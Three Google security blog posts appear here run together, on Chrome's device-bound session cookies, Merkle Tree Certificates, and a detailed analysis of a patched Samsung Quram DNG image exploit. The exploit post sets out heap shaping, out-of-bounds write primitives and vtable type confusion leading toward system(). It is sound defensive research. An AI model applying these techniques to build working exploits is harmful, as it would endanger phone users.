Posted by Ben Ackerman, Chrome team, Daniel Rubery, Chrome team and Guillaume Ehinger, Google Account Security team
Following our April 2024 announcement, Device Bound Session Credentials (DBSC) is now entering public availability for Windows users on Chrome 146, and expanding to macOS in an upcoming Chrome release. This project represents a significant step forward in our ongoing efforts to combat session theft, which remains a prevalent threat in the modern security landscape.
Session theft typically occurs when a user inadvertently downloads malware onto their device. Once active, the malware can silently extract existing session cookies from the browser or wait for the user to log in to new accounts, before exfiltrating these tokens to an attacker-controlled server. Infostealer malware families, such as LummaC2, have become increasingly sophisticated at harvesting these credentials. Because cookies often have extended lifetimes, attackers can use them to gain unauthorized access to a user’s accounts without ever needing their passwords; this access is then often bundled, traded, or sold among threat actors.
Crucially, once sophisticated malware has gained access to a machine, it can read the local files and memory where browsers store authentication cookies. As a result, there is no reliable way to prevent cookie exfiltration using software alone on any operating system. Historically, mitigating session theft relied on detecting the stolen credentials after the fact using a complex set of abuse heuristics – a reactive approach that persistent attackers could often circumvent. DBSC fundamentally changes the web's capability to defend against this threat by shifting the paradigm from reactive detection to proactive prevention, ensuring that successfully exfiltrated cookies cannot be used to access users’ accounts.
How DBSC Works
DBSC protects against session theft by cryptographically binding authentication sessions to a specific device. It does this using hardware-backed security modules, such as the Trusted Platform Module (TPM) on Windows and the Secure Enclave on macOS, to generate a unique public/private key pair that cannot be exported from the machine. The issuance of new short-lived session cookies is contingent upon Chrome proving possession of the corresponding private key to the server. Because attackers cannot steal this key, any exfiltrated cookies quickly expire and become useless to those attackers. This design allows large and small websites to upgrade to secure, hardware-bound sessions by adding dedicated registration and refresh endpoints to their backends, while maintaining complete compatibility with their existing front-end. The browser handles the complex cryptography and cookie rotation in the background, allowing the web app to continue using standard cookies for access just as it always has.
Google rolled out an early version of this protocol over the last year. For sessions protected by DBSC, we have observed a significant reduction in session theft since its launch.
An overview of the DBSC protocol showing the interaction between the browser and server.
Private by design
A core tenet of the DBSC architecture is the preservation of user privacy. Each session is backed by a distinct key, preventing websites from using these credentials to correlate a user's activity across different sessions or sites on the same device. Furthermore, the protocol is designed to be lean: it does not leak device identifiers or attestation data to the server beyond the per-session public key required to certify proof of possession. This minimal information exchange ensures DBSC helps secure sessions without enabling cross-site tracking or acting as a device fingerprinting mechanism.
Engagement with the ecosystem
DBSC was designed from the beginning to be an open web standard through the W3C process and adoption by the Web Application Security Working Group. Through this process we partnered with Microsoft to design the standard to ensure it works for the web and got input from many in the industry that are responsible for web security.
Additionally, over the past year, we have also conducted two Origin Trials to ensure DBSC effectively serves the requirements of the broader web community. Many web platforms, including Okta, actively participated in these trials and their own testing and provided essential feedback to ensure the protocol effectively addresses their diverse needs.
If you are a web developer and are looking for a way to secure your users against session theft, refer to our developer guide for implementation details. Additionally, all the details about DBSC can be found on the spec and the corresponding github. Feel free to use the issues page to report bugs or provide feature requests.
Future improvements
As we continue to evolve the DBSC standard, future iterations will focus on increasing support across diverse ecosystems and introducing advanced capabilities tailored for complex enterprise environments. Key areas of ongoing development include:
Securing Federated Identity: In modern enterprise environments, Single Sign-On (SSO) is ubiquitous. We are expanding the DBSC protocol to support cross-origin bindings, ensuring that a relying party (RP) session remains continuously bound to the same original device key used by the Identity Provider (IdP). This guarantees that the high-assurance security of the initial device binding is maintained throughout the entire federated login process, creating an unbroken chain of trust.
Advanced Registration Capabilities: While DBSC provides robust protection for established cookies, some environments require an even stronger foundation when the session is first created. We are developing mechanisms to bind DBSC sessions to pre-existing, trusted key material rather than generating a new key at sign-in. This advanced capability enables websites to integrate complementary technologies, such as mTLS certificates or hardware security keys, creating a highly secure registration environment.
Broader Device Support: We are also actively exploring the potential addition of software-based keys to extend protections to devices without dedicated secure hardware.
Today we're announcing a new program in Chrome to make HTTPS certificates secure against quantum computers. The Internet Engineering Task Force (IETF) recently created a working group, PKI, Logs, And Tree Signatures (“PLANTS”), aiming to address the performance and bandwidth challenges that the increased size of quantum-resistant cryptography introduces into TLS connections requiring Certificate Transparency (CT). We recently shared our call to action to secure quantum computing and have written about challenges introduced by quantum-resistant cryptography and some of the steps we’ve taken to address them in earlier blogposts.
To ensure the scalability and efficiency of the ecosystem, Chrome has no immediate plan to add traditional X.509 certificates containing post-quantum cryptography to the Chrome Root Store. Instead, Chrome, in collaboration with other partners, is developing an evolution of HTTPS certificates based on Merkle Tree Certificates (MTCs), currently in development in the PLANTS working group. MTCs replace the heavy, serialized chain of signatures found in traditional PKI with compact Merkle Tree proofs. In this model, a Certification Authority (CA) signs a single "Tree Head" representing potentially millions of certificates, and the "certificate" sent to the browser is merely a lightweight proof of inclusion in that tree.
Why MTCs?
MTCs enable the adoption of robust post-quantum algorithms without incurring the massive bandwidth penalty of classical X.509 certificate chains. They also decouple the security strength of the corresponding cryptographic algorithm from the size of the data transmitted to the user. By shrinking the authentication data in a TLS handshake to the absolute minimum, MTCs aim to keep the post-quantum web as fast and seamless as today’s internet, maintaining high performance even as we adopt stronger security. Finally, with MTCs, transparency is a fundamental property of issuance: it is impossible to issue a certificate without including it in a public tree. This means the security properties of today’s CT ecosystem are included by default, and without adding extra overhead to the TLS handshake as CT does today.
Chrome’s MTC Propagation Plan
Chrome is already experimenting with MTCs with real internet traffic, and we intend to gradually build out our deployment such that MTCs provide a robust quantum-resistant HTTPS available for use throughout the internet.
Broadly speaking, our rollout spans three distinct phases.
Phase 1 (UNDERWAY): In collaboration with Cloudflare, we are conducting a feasibility study to evaluate the performance and security of TLS connections relying on MTCs. To ensure a seamless and secure experience for Chrome users who might encounter an MTC, every MTC-based connection is backed by a traditional, trusted X.509 certificate during this experiment. This "fail safe" allows us to measure real-world performance gains and verify the reliability of MTC issuance without risking the security or stability of the user's connection.
Phase 2 (Q1 2027): Once the core technology is validated, we intend to invite CT Log operators with at least one “usable” log in Chrome before February 1, 2026 to participate in the initial bootstrapping of public MTCs. These organizations have already demonstrated the operational excellence and high-availability infrastructure required to run global security services that underpin TLS connections in Chrome. Since MTC technology shares significant architectural similarities with CT, these operators are uniquely qualified to ensure MTCs are able to get off the ground quickly and successfully.
Phase 3 (Q3 2027): Early in Phase 2, we will finalize the requirements for onboarding additional CAs into the new Chrome Quantum-resistant Root Store (CQRS) and corresponding Root Program that only supports MTCs. This will establish a modern, purpose-built trust store specifically designed for the requirements of a post-quantum web. The Chrome Quantum-resistant Root Program will operate alongside our existing Chrome Root Program to ensure a risk-managed transition that maintains the highest levels of security for all users. This phase will also introduce the ability for sites to opt in to downgrade protections, ensuring that sites that only wish to use quantum-resistant certificates can do so.
This area is evolving rapidly. As these phases progress, we will continue our active participation in standards bodies such as the IETF and C2SP, ensuring that insights gathered from our efforts flow back towards standards, and that changes in standards are supported by Chrome and the CQRS.
Cultivating new practices and policy for a more secure and reliable web
We view the adoption of MTCs and a quantum-resistant root store as a critical opportunity to ensure the robustness of the foundation of today’s ecosystem. By designing for the specific demands of a modern, agile, internet, we can accelerate the adoption of post-quantum resilience for all web users.
We expect this modern foundation for TLS to evolve beyond current ecosystem norms and emphasize themes of security, simplicity, predictability, transparency and resilience. These properties might be expressed by:
Grounding our approach in first principles, prioritizing only elements essential for establishing a secure connection between a server and a client.
Utilizing ACME-only workflows to reduce complexity and ensure the cryptographic agility required to respond to future threats across the entire ecosystem.
Upgrading to a modern framework for communicating revocation status. This allows for the replacement of legacy CRLs and streamlined requirements to focus only on key compromise events.
Exploring “reproducible” Domain Control Validation to create a model where proofs of domain control are publicly and persistently available, empowering any party to independently verify the legitimacy of a validation (i.e., serve as a “DCV Monitor”).
Enhancing the CA inclusion model to prioritize proven operational excellence. By establishing a pathway where prospective MTC CA Owners can first demonstrate their reliability as Mirroring Cosigners and DCV Monitors, we ensure that acceptance is based on verified performance and a reliable track record.
Evolving the third-party oversight model to prioritize complete, continuous, and externally verifiable monitoring. This shift would focus on ensuring a high standard of transparency and consistency, providing immediate and reliable insights into performance that can replace the function of annual third-party audits.
To secure the future of the web, we are dedicating our operational resources to two vital parallel tracks. First, we remain fully committed to supporting our current CA partners in the Chrome Root Store, facilitating root rotations to ensure existing non-quantum-resistant hierarchies remain robust and conformant with the Chrome Root Program Policy. Simultaneously, we are focused on building a secure future by developing and launching the infrastructure required to support MTCs and their default use in Chrome. We also expect to support “traditional” X.509 certificates with quantum-resistant algorithms for use only in private PKIs (i.e., those not included in the Chrome Root Store) later this year.
As we execute and refine our work on MTCs, we look forward to sharing a concrete policy framework for a quantum-resistant root store with the community, and are excited to learn and define clear pathways for organizations to operate as Chrome-trusted MTC CAs.
Between July 2024 and February 2025, 6 suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of Google Threat Intelligence Group.
Investigation of these images showed that these images were DNG files targeting the Quram library, an image parsing library specific to Samsung devices.
On November 7, 2025 Unit 42 released a blogpost describing how these exploits were used and the spyware they dropped. In this blogpost, we would like to focus on the technical details about how the exploits worked. The exploited Samsung vulnerability was fixed in April 2025.
There has been excellent prior work describing image-based exploits targeting iOS, such as Project Zero’s writeup on FORCEDENTRY. Similar in-the-wild “one-shot” image-based exploits targeting Android have received less public documentation, but we would definitely not argue it is because of their lack of existence. Therefore we believe it is an interesting case study to publicly document the technical details of such an exploit on Android.
Attack vector
The VirusTotal submission filenames of several of these exploits indicated that these images were received over WhatsApp:
IMG-20240723-WA0000.jpg
IMG-20240723-WA0001.jpg
IMG-20250120-WA0005.jpg
WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg
The first filenames listed follow the naming scheme of WhatsApp on Android. The last filename is how WhatsApp Web names image downloads.
The first two images were received on the same day, based on the filename, potentially by the same target. Later analysis showed that the first image targets the jemalloc allocator, while the second one targets the scudo allocator, used on more recent Android versions. This blogpost will detail the scudo version of the exploit as this allocator is more hardened and relevant for recent devices. The concepts and techniques used in the jemalloc version are similar.
The final payload (as we’ll see later) indicates that the exploit expects to run within the com.samsung.ipservice process. How are WhatsApp and com.samsung.ipservice related and what is this process?
The com.samsung.ipservice process is a Samsung-specific system service responsible for providing “intelligent” or AI-powered features to other Samsung applications. It will periodically scan and parse images and videos in Android’s MediaStore.
When WhatsApp receives and downloads an image, it will insert it in the MediaStore. This means that downloaded WhatsApp images (and videos) can hit image parsing attack surface within the com.samsung.ipservice application.
However, WhatsApp does not intend to automatically download images from untrusted contacts. (WhatsApp on Android’s logic is a bit more nuanced though. More details can be found in Brendon Tiszka’s report of a different issue). This means that without additional bypasses and assuming the image is sent by an untrusted contact, a target would have to click the image to trigger the download and have it added to the MediaStore. This would mean this is in fact a “1-click” exploit. We don’t have any knowledge or evidence of the attacker using such a bypass though.
A curious image
Before we delve into the exploit, let’s gather an understanding of what type of file we are looking at.
$ file "WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg"
WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg: TIFF image data, little-endian, direntries=24, width=1, height=1, bps=8, compression=none, PhotometricInterpretation=BlackIsZero, description={"shape": [1, 1, 1]}, manufacturer=Canon, model=Canon EOS 350D DIGITAL, orientation=upper-left
$ exiftool "WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg"
...
File Type : DNG
File Type Extension : dng
MIME Type : image/x-adobe-dng
...
Image Width : 16
Image Height : 16
Bits Per Sample : 8
Compression : Uncompressed
Photometric Interpretation : Color Filter Array
Image Description : {"shape": [16, 16]}
Samples Per Pixel : 1
X Resolution : 1
Y Resolution : 1
Resolution Unit : None
Tile Width : 16
Tile Length : 16
Tile Offsets : 6596538
Tile Byte Counts : 256
CFA Repeat Pattern Dim : 2 2
CFA Pattern 2 : 0 1 1 2
CFA Plane Color : Red,Green,Blue
CFA Layout : Rectangular
Active Area : 0 0 10 10
Opcode List 1 : [opcode 23], [opcode 23], [opcode 23], [opcode 23], ...
Opcode List 2 : [opcode 23], [opcode 23], [opcode 23], [opcode 23], [opcode 23], ...
Opcode List 3 : TrimBounds, DeltaPerColumn, DeltaPerColumn, DeltaPerColumn, ...
Subfile Type : Full-resolution image
Strip Offsets : 6596794
Strip Byte Counts : 1
...
(We truncated the “Opcode List” lines, since they contained thousands of opcodes in the actual exiftool output.)
Although the image was saved with a jpeg extension, this image is in fact a Digital Negative (DNG) image. According to Wikipedia:
Digital Negative (DNG) is an open source, lossless, well defined camera RAW data container with the goal to replace a range of proprietary, closed source raw image containers. It has been developed by Adobe. … DNG is based on the TIFF/EP standard format, and mandates significant use of metadata. The specification of the file format is open and not subject to any intellectual property restrictions or patents.
The image width and height look suspiciously small. And what are these opcode lists?
Some DNG format basics
The DNG format specification can be found on Adobe’s website.
DNG files use SubIFD trees, as described in the TIFF-EP specification, in order to contain multiple versions of the same image, such as a preview and a main image. This DNG file has 3 SubIFDs:
Type “Preview Image” with width 1 and length 1
Type “Main Image” with width 16 and length 16
Type “Main Image” with width 1 and length 1
As we mentioned already briefly, the sizes of these images are obviously very suspicious, as well as the fact that there are 2 “Main Image” types. We have not figured out what the purpose of the second main image is (if any).
DNG images can contain 3 “opcode lists”. As it will turn out, these “opcodes” will be very important in the context of this exploit. Their goal is to offload some processing steps from the camera to the DNG reader. Their intended use case is for example to perform lens corrections. The reason there are 3 opcode lists is because they are intended to be applied at different moments during the DNG decoding:
The raw image bytes are read from the DNG file, a.k.a. the “stage 1” image
Opcode list 1 specifies the list of opcodes that should be applied to the stage 1 image
The DNG decoder maps the raw image bytes to linear reference values, which results in a “stage 2” image.
Opcode list 2 specifies the list of opcodes that should be applied to the stage 2 image
The DNG decoder performs demosaicing of the linear reference values, which results in a “stage 3” image.
Opcode list 3 specifies the list of opcodes that should be applied to the stage 3 image.
Every opcode has an opcode ID and varying number and type of parameters. The latest specification (1.7.1.0 from September 2023), contains 14 distinct opcodes, with opcode IDs going from 1 to 14. Below is an example of opcode description found in the specification:
For this exploit, only 3 opcodes will be of interest:
TrimBounds (opcode ID 6): This opcode trims the image to a specified rectangle.
MapTable (opcode ID 7): This opcode maps a specified area and plane range of an image through a 16-bit lookup table.
DeltaPerColumn (opcode ID 11): This opcode applies a per-column delta (constant offset) to a specified area and plane range of an image.
DeltaPerColumn and MapTable perform transformations on areas (defined by a top, left, bottom and right parameter) and plane ranges (defined by a first plane and number of planes parameter).
Looking at the opcode lists in the exiftool output above, we already notice some suspicious things:
They use opcodes with opcode ID 23 (which exiftool can not map to an opcode name).
Typical benign DNG images will contain only a handful of opcodes, while for this image we have thousands of opcodes in the opcode lists.
Quram
As we mentioned before, the targeted process based on the payload is the Samsung firmware specific com.samsung.ipservice. The next question then becomes what code in this application performs the DNG decoding.
Looking at a decompiled com.samsung.ipservice APK (which on our test phone was located at /system/priv-app/IPService/IPService.apk), we can see that when the application parses a file with an extension of “jpg”, “jpeg”, “JPG” or “JPEG”, it will call into the Java method com.quramsoft.images.QrBitmapFactory.decodeFile (bundled in the same APK).
publicclasscom.quramsoft.images.QrBitmapFactory{publicstaticBitmapdecodeFile(Stringstr,Optionsoptions){BitmapdecodeFile=QuramBitmapFactory.decodeFile(str,options);// [1]; calls into Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2// Failsif((options.inJustDecodeBounds&&(options.outWidth>0||options.outHeight>0))||decodeFile!=null){returndecodeFile;}try{BitmapdecodeFile2=QuramDngBitmap.decodeFile(str,options);// [2]; calls into Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNIif(options.outWidth<=0){if(options.outHeight<=0){returndecodeFile2;}}options.outMimeType="image/dng";returndecodeFile2;}catch(IOExceptione2){e2.printStackTrace();returnnull;}}
The “Quram library” is a set of proprietary, closed-source software libraries used by Samsung on its Android devices. Its primary function is to process, parse, and decode various image formats. The library is not developed by Samsung itself. It is created by a third-party software vendor named Quramsoft. Mateusz Jurczyk already wrote about this library in 2020.
The QrBitmapFactory.decodeFile method will first try to decode the image using QuramBitmapFactory.decodeFile (see [1]), which calls the exported Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2 function of the native library libimagecodec.quram.so. This function handles formats such as PNG, JPEG and GIF, but not DNG. This native library is not part of the IPService APK but rather located at /system/lib64/libimagecodec.quram.so.
When QuramBitmapFactory.decodeFile fails, QrBitmapFactory.decodeFile calls QuramDngBitmap.decodeFile as a fallback (see [2]), which then calls Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI. This function will perform the complete DNG decoding and it is within this code path the vulnerability is triggered and the exploit fully executes.
A few tools came in handy when analysing this exploit, which we’ll describe next.
First of all, on the static analysis side, we need an overview of the different opcodes that are called with their parameters. exiftool only gives us a list of the (translated) opcode IDs. To inspect every opcode with its parameters, we can use the dng_validate tool provided by Adobe’s DNG SDK with the -v flag. It will parse the opcode lists and we can post-process its textual output to make sense of the thousands of opcodes. Here is a snippet of what the output looks like, showing us the different parameters of a few TrimBounds and DeltaPerColumn opcodes.
On the dynamic analysis side, debugging com.samsung.ipservice would be very annoying, since it only runs periodically (although there are tricks to force start it). For easier debugging, we reused @flankerhqd’s fuzzing harness (in part based on Project Zero’s SkCodecFuzzer), which loads a DNG file provided as a filename into a buffer and passes it to libimagecodec.quram.so’s QrDecodeDNGPreview. We compile it as a standalone binary and can run it under a debugger.
It is noteworthy that QrDecodeDNGPreview (used in our harness) is not the export called by com.samsung.ipservice (which ends up calling QuramDngDecoder::decode). However, if there is no preview image available with one of the JPEG compression types, QrDecodeDNGPreview will call QuramDngDecoder::decodePreview, which will also perform a full DNG decoding and successfully triggers the vulnerability and exploit.
Our test phone was a Samsung Galaxy S21 5G (SM-G991B) running firmware version G991BXXSAFXCL, which has a security patch level of 2024-04-01.
The bug
Using the dng_validate tool we can make a listing of the sequence of opcodes called and their number of repetitions:
The specification mentions that if the flag bit is set (which it is), opcodes with unknown opcode IDs should be skipped. So let’s for the moment ignore the “Unknown” opcodes with ID 23 (more on them later).
Let’s look at the first 2 known opcodes, which occur in opcode list 3:
The DNG opcode parameters are embedded directly in the file. DeltaPerColumn takes a list of deltas to be applied to each pixel and the “Area Spec” to work over: top, left, right, bottom coordinates, the plane and total number of planes being targeted, and the length of each row and column (rowPitch and colPitch). These values are controllable by the attacker.
The “first plane” (5125) and “number of planes” (5123) parameters of the DeltaPerColumn opcode are very suspicious. At stage 3 in the DNG decoding, the number of planes will be 3 (R, G and B), as can be seen in the CFA related data of the exiftool output. The first value (5125) is the first plane to apply the DeltaPerColumn to, while the second value (5123) is the number of planes. Since the planes are numbered 0 to 2, these values are clearly out of bounds.
Let’s have a look at QuramDngOpcodeDeltaPerColumn::processArea, which is the handler for the DeltaPerColumn opcode. Below are the relevant lines of that function for the vulnerability. (Variable names are chosen by us since this is a closed source library)
__int64__fastcallQuramDngOpcodeDeltaPerColumn::processArea(QuramDngOpcode*opcode,QuramDngDecoder*decoder,QuramDngImage*image,QuramDngRect*rect){...image_buffer=image->buffer;...image_number_of_planes=image_buffer->planes;// 3opcode_first_plane=opcode->plane;// 5125....opcode_number_of_planes=opcode->planes;// 5123opcode_last_plane=image_number_of_planes+opcode_number_of_planes;// 3 + 5123 = 5126...if(opcode_first_plane<opcode_last_plane)// 5125 < 5126{...current_plane=opcode_first_plane;// 5125...do{...// Add delta to the value in the raw pixel buffer at offset corresponding to plane `current_plane`, i.e. 5125!current_plane++;}while(current_plane!=opcode_last_plane);// 5125 != 5126...}
The function takes a few objects with Quram specific structure as arguments. The QuramDngImage describes the image on which the opcode is to be applied (which is the stage 3 image at this point). The QuramDngOpcode contains the DeltaPerColumn parameters. The function has a triple nested loop to iterate over the width, length and planes of the area. For every such triplet (width,length,plane) it calculates the offset in the raw pixel buffer and adds a delta to it. Only the plane loop is relevant for the bug and displayed in the code above.
Below is an example of a 6x6 image with its different color planes and to what offsets the pixel values map in the raw pixel buffer. During stage 2 and stage 3 image processing, each pixel value in each color plane takes 16 bits.
There are two issues in that handler function:
opcode_last_plane is calculated incorrectly. It should be opcode_first_plane + opcode_number_of_planes (as will be the case in the patched version). This by itself is a correctness issue (and a pretty basic one that would be expected to surface by normal usage or testing of the library).
The plane used in the offset calculation is bounded by opcode_last_plane, but at no point is it checked that opcode_last_plane is within the number of planes that the image contains.
The actual values from the exploit are annotated as comments in the code snippet. With these values, the plane loop will be executed exactly once. The width and length loop will also be executed only once, since t=0, l=0, b=1, r=1. This means exactly one write will happen. Since the stage 3 image in the exploit has a width 1 and length 1, the write will happen at offset 5125 x 2 = 10250 from the raw pixel buffer.
Not only the offset of the write is controlled, the value to be added to the current value in the raw pixel buffer is also fully controlled, since it is an opcode parameter. In this case it is 26214.0 (or 0x6666). This vulnerability gives thus a very strong primitive from the start: the attacker can add chosen values at chosen offsets with respect to the raw pixel buffer.
Now why do we need that TrimBounds opcode before triggering the bug? That will become clear when we discuss the heap shaping strategy.
Exploit flow
Heap shaping strategy
Since the buffers containing the pixel values are dynamically allocated on the heap, it is important to understand what heap allocations the Quram library makes and how these allocations behave to understand the heap layout at the time of the vulnerability triggering.
As we mentioned earlier, exploits exist for Android versions using both jemalloc and scudo allocator. We will analyse the exploit targeting the scudo allocator, since this is the common allocator on modern Android versions. The same techniques were used in a different way in the jemalloc exploit.
Scudo
We will not give a detailed overview of Android’s scudo allocator, which is being used here for the allocations, since excellent documentation by Synacktiv already exists, to which we refer. We will only mention the elements that are important for this exploit.
Scudo allocates objects in different heap regions depending on the allocation size. For two objects of different types to land near each other, they need to belong to the same size class. The size required from the allocator’s point of view for a “block” is composed of:
A header of 0x10 bytes
The chunk with the user requested size. A pointer to the chunk is returned to the caller.
New allocations are retrieved via “transfer batches”. The number of allocations in a transfer batch depends on the size class. For the size we will be interested in (chunks of 0x30 bytes, i.e. blocks of 0x40 bytes), there are 52 allocations in a transfer batch. The allocations within a transfer batch are returned in a randomized order, however subsequent transfer batches are just laid out linearly in memory. A consequence of this is that given enough allocations between two allocations of the same size, an attacker can be confident that the last allocation falls after the first allocation.
Lastly, scudo supports a quarantine mechanism that prevents freed allocations to be returned immediately on a next allocation request. However on Android this quarantine mechanism is disabled. The consequence is that a freed object will be directly reallocated on the next allocation request of the same size.
Quram’s heap allocations
With a basic understanding of scudo’s allocation behaviour, let’s look at the specific heap allocations Quram makes when decoding a DNG file.
First, when Quram parses the opcode lists in the DNG file, it will allocate one QuramDngOpcode object per opcode. These objects contain the parameters of the opcode, as well as a vtable pointer to the handlers for that opcode. The size of such an object depends thus on the number and type of parameters and hence on the type of opcode. The size of the different opcodes can be looked up in QuramDngDecoder::makeDngOpcode. For the exploit at hand, only the following opcode sizes are relevant:
DeltaPerColumn (opcode ID 11): 0x50 bytes
MapTable (opcode ID 7): 0x50 bytes
TrimBounds (opcode ID 6): 0x30 bytes
Unknown (starting at opcode ID 14, such as opcode ID 23 in the exploit): 0x30 bytes
This means TrimBounds and Unknown opcodes will land in the same heap region, distinct from the heap region containing the DeltaPerColumn and MapTable opcodes.
Next, for every stage image, Quram will allocate three heap buffers:
A QuramDngImage of fixed size 0x30, which describes the image
A buffer for the pixel values of variable size (depending on width, height and number of planes)
A QuramDngPixelBuffer of fixed size 0x40, which describes the contents of the buffer
These different objects and their relationship are illustrated below:
There are two “pixel buffers” at play here, which can be a bit confusing: the QuramDngPixelBuffer object and the raw buffer with pixel values. In what comes, when we talk about “raw pixel buffer”, we refer to the latter.
QuramDngImage and QuramDngPixelBuffer will land in different heap regions since they belong to different scudo allocation class sizes. The raw pixel buffer may end up in the same heap region as a QuramDngImage depending on its size. Its size is calculated by ComputeBufferSize. For the dimensions of the stage 3 image of the exploit (width 1 by length 1 with 3 color planes) it will calculate a size of 0x30 bytes (even though 6 bytes would suffice). For the stage 1 and stage 2 images, the sizes are different and will be allocated in a different heap region.
To conclude, both the TrimBounds opcodes, the Unknown opcodes, the QuramDngImage objects as well as potentially the raw pixel buffer will end up in the same heap region.
Final heap layout
We can now study the sequence of events during DNG decoding to understand the heap layout at the time of the vulnerability trigger:
QuramDngDecoder::getRegionStage1Image will allocate a “stage 1” QuramDngImage (size 0x30)
QuramDngDecoder::readStage1Image parses the 3 opcode lists and allocates a QuramDngOpcode structure per opcode. As we saw, only TrimBounds and Unknown opcodes will land in the same heap region of 0x30 bytes chunks, which is of interest to us. Other opcodes are allocated in different heap regions.
QuramDngDecoder::buildStage2Image will apply opcode list 1. When it is done, the 20000 unknown opcodes it contains are freed.
QuramDngDecoder::doBuildStage2 will allocate a QuramDngImage “stage 2” (size 0x30) and convert stage 1 to stage 2. This stage 2 image will take the spot of the last opcode of opcode list 1 that was freed.
QuramDngDecoder::buildStage2Image can now free the “stage 1” QuramDngImage. It will then process the opcode list 2, and free the 240 “unknown” opcodes.
QuramDngDecoder::doInterpolateStage3 will allocate both a new “stage 3” QuramDngImage (size 0x30) and subsequently a raw pixel buffer of size 0x30. These will take the spots of the last 2 opcodes freed from opcode list 2 in the previous step.
QuramDngDecoder::buildStage3Image can now free the “stage 2” QuramDngImage.
Opcode list 3 gets processed now. In the first TrimBounds opcode, QuramDngOpcodeTrimBounds::doApply will allocate a new raw pixel buffer of size 0x30 (although the replaced raw pixel buffer has the exact same size). This allocation will take the spot of the freed stage 2 image.
Note that the 640 other TrimBounds opcodes have a “minVersion” of 1.4.0.1. This is a trick that will make QuramDngOpcode::aboutToApply bail out early and not have the TrimBounds actually executed. The goal of spraying these 640 TrimBounds opcodes will become clear later.
The eventual heap layout for chunks of size 0x30 is illustrated below. The annotated offsets will be important later on.
Note that because of scudo’s randomization strategy, the allocations of different opcode lists will actually overlap slightly (on the order of 52 allocations), but given enough allocations this effect can be neglected.
Because the allocations have chunk sizes of 0x30 bytes, they take up 0x40 bytes on the heap. Different chunks in this heap region are thus spaced by multiples of 0x40 bytes, which will help us in quickly inferring what parts of an object are being corrupted. The illustration also depicts the sizes the allocations occupy in total, which will be important for understanding the subsequent exploitation flow.
As we’ll see, the exploit will write out of bounds from the raw pixel buffer of stage 3 into the QuramDngImage of stage 3. This explains why the attackers first used a TrimBounds opcode before triggering the bug: it assures that the raw pixel buffer will end up before the QuramDngImage. Without it, there would be a one out of two chance that the raw pixel buffer takes a spot after the QuramDngImage.
The initial corruption
After achieving the right heap layout using the TrimBounds, 480 DeltaPerColumn opcodes follow. As a reminder, these are allocated in a different heap region because of a different allocation size. As discussed, DeltaPerColumn opcodes are able to add arbitrary values to arbitrary offsets out of bounds. The attackers add 0x6666 to offsets 10 and 12 within 240 heap objects, starting at offset 0x2800 from the raw pixel buffer and ending at offset 0x6400.
Looking at our heap layout, we will corrupt three types of objects at these offsets:
Unknown and TrimBounds opcodes: opcode structures contain the opcode ID at offset 8 and the specification version at offset 12. Since the opcode IDs will be corrupted, these TrimBounds and Unknown opcodes will simply be skipped later on (which was already the case for the Unknown opcodes).
Most importantly, it will encounter the QuramDngImage object. The two corrupted fields of this object are the “bottom” and “right” fields of the image, which are used in other opcode handlers for verifying if operations are within bounds. This means that we can now use other opcodes, such as MapTable, to perform actions out of bounds.
Under regular circumstances, the “left” and “right” value would be out of bounds and this opcode would not perform any operation. Because we corrupted the dimensions of the QuramDngImage though, this opcode will operate out of bounds.
Extending the primitives
Incrementing arbitrary out of bound values with chosen values is a powerful primitive, but the exploit will also want to write absolute arbitrary values out of bounds. The former can be converted pretty easily into the latter though.
If we have a primitive to write zeros out of bounds, we can combine that with the increment primitive to write arbitrary values in two steps: zero the memory and then increment it with the value we want to write.
Zeroing memory can be done in two ways, and both are used in the exploit:
Using the MapTable opcode with a substitution table of all zeros
Using the DeltaPerColumn opcode. The “Delta” parameter is a float, and -Infinity is supported, which sets the resulting value to 0.
In the exploit, MapTable is only used to zero large regions, likely because of the large space overhead of the MapTable opcode (as it requires a substitution table of 65536 values to be included).
Crafting a bogus MapTable opcode
With linear out-of-bounds write primitive in place, the exploit could now:
Write a shell command somewhere out of bounds
Write a JOP gadget chain somewhere out of bounds which ends up calling system()
Overwrite the vtable pointer of one of the opcode objects to be executed to kick off the JOP chain, resulting in a system(<shell command>) execution
There is one important issue though: we don’t know any of the required addresses, since both the heap and the libraries are subject to ASLR. To leak the addresses of the JOP gadgets, the exploit has to do a bit more work.
This opcode will act on offset 5120 x 2 bytes/pixel x 3 colors/pixel = 0x7800 from the raw pixel buffer, which is in the region of those 641 TrimBounds opcodes.
It is corrupting the lower 2 bytes of the vtable pointer of a TrimBounds opcode object. Looking at the substitution table, most values are mapped to itself, however a few are not. (We had to write an additional script to parse this out, since dng_validate’s output of these long substitution tables is truncated).
For example, the value 0xecf0 is mapped to 0xed30. Looking at the libimagecodec.quram.so binary, the new address points to the MapTable vtable. This trick allows the attackers to “type confuse” a TrimBounds opcode to a MapTable opcode, by moving the vtable pointer to a different one, without having to leak any ASLR first.
Their substitution table supports different versions of the library, which works because there are not that many versions of the library (the exploit supports 7 versions) and the lower bytes of the vtable do not collide. Moreover, since ASLR is applied at page level granularity, they need to account for every page multiple the vtable can be mapped at. Say we have the following vtable offsets:
libimagecodec.quram.so version x
libimagecodec.quram.so version y
QuramDngOpcodeTrimBounds vtable offset
0x2dccf0
0x2dce10
QuramDngOpcodeMapTable vtable offset
0x2dcd30
0x2dce50
Then the following MapTable substitution table would be constructed (omitting values that don’t matter and can map to whatever):
Using the previously described arbitrary write primitive, the exploit also corrupts various fields of the TrimBounds object to transform it into a functional bogus MapTable object. Note that a regular MapTable opcode object is bigger than a TrimBounds opcode and would hence also land in a different scudo heap class in normal circumstances. Obviously, the library is unaware and will just read opcode arguments out of bounds in this case.
The constructed bogus MapTable opcode object looks like this:
Before:
00007800: f0fc f8cc 7f00 0000 0600 0000 0100 0401 // TrimBounds opcode X
00007810: 0100 0000 0100 0000 0300 0000 0000 0000
00007820: 0000 0000 0100 0000 0100 0000 0000 0000
00007830: 0301 0300 0000 71ca 0000 0000 0000 0000
00007840: f0fc f8cc 7f00 0000 0600 0000 0100 0401 // TrimBounds opcode Y
After:
00007800: 30fd f8cc 7f00 0000 0600 0000 0000 0401
